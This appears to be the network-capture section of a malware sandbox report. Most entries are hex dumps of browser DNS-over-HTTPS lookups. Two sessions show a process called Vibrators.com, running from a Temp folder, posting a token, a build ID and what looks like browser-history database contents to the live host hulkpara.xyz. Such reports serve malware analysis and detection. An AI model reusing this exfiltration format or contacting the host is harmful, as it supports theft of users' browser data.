2024-12-18 20:09:31 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-12-18 20:09:31 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Wed, 18 Dec 2024 20:09:31 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8f41ca83db864294-EWR alt-svc: h3=":443"; ma=86400
2024-12-18 20:09:31 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 ed 00 04 8e fb 29 03 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom))

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.9	49782	162.159.61.3	443	4108	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:09:31 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-12-18 20:09:31 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-12-18 20:09:31 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Wed, 18 Dec 2024 20:09:31 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8f41ca842cdede9b-EWR alt-svc: h3=":443"; ma=86400
2024-12-18 20:09:31 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 29 00 04 8e fb 20 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom) c)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.9	49796	94.130.191.168	443	7852	C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:09:31 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----90H4ECB16P8YM7YMGD2V User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: hulkpara.xyz Content-Length: 3165 Connection: Keep-Alive Cache-Control: no-cache
2024-12-18 20:09:31 UTC	3165	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 39 30 48 34 45 43 42 31 36 50 38 59 4d 37 59 4d 47 44 32 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 61 31 36 30 65 62 33 65 61 31 31 66 65 32 65 36 38 34 31 38 31 33 62 39 33 63 37 39 38 64 0d 0a 2d 2d 2d 2d 2d 2d 39 30 48 34 45 43 42 31 36 50 38 59 4d 37 59 4d 47 44 32 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 39 30 48 34 45 43 42 31 36 50 38 59 4d 37 59 4d 47 44 32 56 0d 0a 43 6f 6e 74 Data Ascii: ------90H4ECB16P8YM7YMGD2VContent-Disposition: form-data; name="token"7fa160eb3ea11fe2e6841813b93c798d------90H4ECB16P8YM7YMGD2VContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------90H4ECB16P8YM7YMGD2VCont
2024-12-18 20:09:32 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 18 Dec 2024 20:09:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-18 20:09:32 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.9	49799	172.64.41.3	443	4108	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:09:32 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-12-18 20:09:32 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-12-18 20:09:32 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Wed, 18 Dec 2024 20:09:32 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8f41ca8b39b041e7-EWR alt-svc: h3=":443"; ma=86400
2024-12-18 20:09:32 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1a 00 04 8e fb 29 03 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom))

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.9	49800	162.159.61.3	443	4108	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:09:32 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-12-18 20:09:32 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-12-18 20:09:32 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Wed, 18 Dec 2024 20:09:32 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8f41ca8bcdca19aa-EWR alt-svc: h3=":443"; ma=86400
2024-12-18 20:09:32 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 9e 00 04 8e fb 28 83 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom()

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.9	49802	162.159.61.3	443	4108	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:09:32 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-12-18 20:09:32 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-12-18 20:09:33 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Wed, 18 Dec 2024 20:09:33 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8f41ca8d5a7d0ca4-EWR alt-svc: h3=":443"; ma=86400
2024-12-18 20:09:33 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 28 00 04 8e fb 29 03 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom())

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.9	49801	94.130.191.168	443	7852	C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:09:32 UTC	327	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----MG4WTRQQIMOZUAIEK6PP User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: hulkpara.xyz Content-Length: 207993 Connection: Keep-Alive Cache-Control: no-cache
2024-12-18 20:09:32 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4d 47 34 57 54 52 51 51 49 4d 4f 5a 55 41 49 45 4b 36 50 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 61 31 36 30 65 62 33 65 61 31 31 66 65 32 65 36 38 34 31 38 31 33 62 39 33 63 37 39 38 64 0d 0a 2d 2d 2d 2d 2d 2d 4d 47 34 57 54 52 51 51 49 4d 4f 5a 55 41 49 45 4b 36 50 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 4d 47 34 57 54 52 51 51 49 4d 4f 5a 55 41 49 45 4b 36 50 50 0d 0a 43 6f 6e 74 Data Ascii: ------MG4WTRQQIMOZUAIEK6PPContent-Disposition: form-data; name="token"7fa160eb3ea11fe2e6841813b93c798d------MG4WTRQQIMOZUAIEK6PPContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------MG4WTRQQIMOZUAIEK6PPCont
2024-12-18 20:09:32 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:32 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:32 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:32 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:32 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:32 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:32 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:32 UTC	16355	OUT	Data Raw: 4d 54 43 6c 51 42 41 59 58 4b 79 73 42 57 58 52 68 59 6d 78 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 42 55 4e 53 52 55 46 55 52 53 42 55 51 55 4a 4d 52 53 42 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 6f 62 6d 46 74 5a 53 78 7a 5a 58 45 70 67 58 38 44 42 78 63 56 46 51 47 44 59 58 52 68 59 6d 78 6c 64 58 4a 73 63 33 56 79 62 48 4d 45 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 56 79 62 48 4d 6f 61 57 51 67 53 55 35 55 52 55 64 46 55 69 42 51 55 6b 6c 4e 51 56 4a 5a 49 45 74 46 57 53 42 42 56 56 52 50 53 55 35 44 55 6b 56 4e 52 55 35 55 4c 48 56 79 62 43 42 4d 54 30 35 48 56 6b 46 53 51 30 68 42 55 69 78 30 61 58 52 73 5a 53 42 4d 54 30 35 48 56 6b Data Ascii: MTClQBAYXKysBWXRhYmxlc3FsaXRlX3NlcXVlbmNlc3FsaXRlX3NlcXVlbmNlBUNSRUFURSBUQUJMRSBzcWxpdGVfc2VxdWVuY2UobmFtZSxzZXEpgX8DBxcVFQGDYXRhYmxldXJsc3VybHMEQ1JFQVRFIFRBQkxFIHVybHMoaWQgSU5URUdFUiBQUklNQVJZIEtFWSBBVVRPSU5DUkVNRU5ULHVybCBMT05HVkFSQ0hBUix0aXRsZSBMT05HVk
